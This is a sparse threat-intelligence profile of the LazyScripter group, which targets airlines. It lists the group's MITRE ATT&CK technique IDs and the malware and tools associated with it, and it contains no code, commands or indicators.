Introduction
LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets. MalwareBytes LazyScripter Feb 2021
Activities and Tactics
Information pending cataloguing.
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1204.001 Malicious Link
- T1218.005 Mshta
- T1608.001 Upload Malware
- T1204.002 Malicious File
- T1102 Web Service
- T1059.007 JavaScript
- T1583.001 Domains
- T1059.005 Visual Basic
- T1071.004 DNS
- T1588.001 Malware
- T1105 Ingress Tool Transfer
- T1036 Masquerading
- T1566.001 Spearphishing Attachment
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1027.010 Command Obfuscation
- T1547.001 Registry Run Keys / Startup Folder
- T1218.011 Rundll32
- T1566.002 Spearphishing Link
- T1583.006 Web Services
ATT&CK technique IDs (denormalized)
- T1027.010
- T1036
- T1059.001
- T1059.003
- T1059.005
- T1059.007
- T1071.004
- T1102
- T1105
- T1204.001
- T1204.002
- T1218.005
- T1218.011
- T1547.001
- T1566.001
- T1566.002
- T1583.001
- T1583.006
- T1588.001
- T1608.001
Notable Indicators of Compromise (IOCs)
No atomic indicators are listed in this profile. The APTnotes snapshot indexes 1 public reports that may contain IOCs; see Source Attribution for dataset links.
Malware and Tools
- CyberGate:
- Cyber Eye RAT:
MITRE ATT&CK Software
- Remcos (S0332) — tool
- QuasarRAT (S0262) — tool
- njRAT (S0385) — malware
- ngrok (S0508) — tool
- Empire (S0363) — tool
- Koadic (S0250) — tool
- KOCTOPUS (S0669) — malware
Attribution and Evidence
Information pending cataloguing.
References
[1] mitre-attack [3] MalwareBytes LazyScripter Feb 2021 Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.